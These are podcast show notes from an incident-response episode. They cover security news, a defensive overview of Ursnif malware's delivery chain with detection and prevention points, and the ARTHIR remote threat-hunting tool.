Formerly the Brakeing Down Incident Response Podcast
Recorded Sept 2019
TOPIC: ARTHIR - ATT&CK Remote Threat Hunting Incident Response tool
OUR GUEST WILL BE:
Olaf Hartong, Co-Founder Falcon Force
@olafhartong and @FalconForceTeam
Blog - https://medium.com/@olafhartong
Github - https://github.com/olafhartong/ThreatHunting
Website - https://www.falconforce.nl
OUR SPONSORS:
NEWS-WORTHY:
ISO Files via EMAIL???
https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/
French Police take dowN Botnet
850,000 PCs involved - shuts down two-year-old Retadup malware operation
Over 10 billion malware attacks detected in 2018
https://www.techradar.com/news/over-10-billion-malware-attacks-detected-in-2018
New research from SonicWall has revealed that a record high of 10.52bn malware attacks occurred in 2018 indicating an escalation in the volume of cyberattacks as well as new targeted threat tactics used by cybercriminals
91% Of Cyberattacks Start With A Phishing Email
According to a new report from PhishMe that found that 91% of cyberattacks start with a phish, the top reasons people are duped by phishing emails are curiosity (13.7%), fear (13.4%), and urgency (13.2%), followed by reward/recognition, social, entertainment, and opportunity.
GUEST Story - Dutch helped with Stuxnet
https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html
SITE-WORTHY:
Guest - LOLBAS
TOOL-WORTHY:
Ummm ARTHIR
MALWARE OF THE MONTH:
URSNif
https://www.sentinelone.com/blog/ursnif-polymorphic-delivery-mechanism-explained/
https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/
This analysis list the MITRE ATT&CK used - very nice
SentinelOne did a good write up about it
Typical Word document delivery
Winword calling PowerShell - Always BAD
Base64 PowerShell executed - Always Bad
VBScript then downloads the payload
Stores it where else, under the User directory structure
Mutates on download, so you won’t find the same hash if multiple users open the document
Key Detection points
AutoRuns of course, but created on shutdown like Dridex
So File and Registry auditing might help catch it on shutdown and boot up… there is a Cheat Sheet for that ;-)
Winword calling PowerShell
PowerShell Base64 encoding
Random named executable
Injects into the browsers
PREVENTION
Scan email attachments
Block Macro execution
Application Whitelist Users directory
Lock down PowerShell
EDR
TOPIC OF THE DAY:
ARTHIR - ATT&CK Remote Threat Hunting Incident Response Tool
What is the problem ARTHIR is trying to solve?
Run LOG-MD remotely and get back the reports is how it started without using an enterprise type solution.
How do you run one or more of your favorite tools remotely against a system and get back the results?
During Incident Response this is an easy tweak to GPO to get it enabled on all machines, nothing to purchase, you already have it
It’s FREEEEeeeeeeee
What project was this forked from?
What improvements were added to make it ARTHIR?
Notes for MITRE ATT&CK Technique IDs
Scheduled task creation on remote systems running PS v2 thru v6
Push a binary to a folder other than the Kansa default C:\Windows
Cleanup module to delete the stuff you run, leave no trace
Run any binary tool you want and get back the native reports
Of course all the old Kansa capabilities
It is fairly easy to use
Why did you take this on and how did you solve the shortcomings of Kansa?
Shout-out to Olaf Hartong and Josh Ricard for their parts in this
Olaf on the report retrieval
Josh on the Schedule Task portion
Get back reports of utility or tool, in our case LOG-MD
Kansa only pulls back PowerShell console output
ARTHIR can do PS console as Kansa did, or the native reports in the native format of the tool, and Kansa is no longer supported by the creator.
What are the requirements for someone wanting to use ARTHIR in a domain and no domain?
Windows Remote Management or WinRM, aka PowerShell Remoteing which is built into all versions of Windows 7 and later
Uses the power of PowerShell v2 thru v5
Domain creds for Domain
Local creds with Authentication being Negotiate for non-domain
What are some use cases for ARTHIR?
Incident Response obviously
Auditing
Threat Hunting
Configuration validation
Manual tweaks, security improvements
Remediation
A way to schedule one of more tasks of your favorite tools, like LOG-MD
Documentation?
WinRm guide
And how to use info too
LOG-MD Professional you get a more detailed guide and all the modules for all the features of LOG-MD Professional and Consulting ships with LOG-MD Pro
Where do people get it?
You can find ARTHIR HERE:
Try it
Contribute
And MAP things to MITRE ATT&CK
Other Articles:
-------------------
Original Kansa Project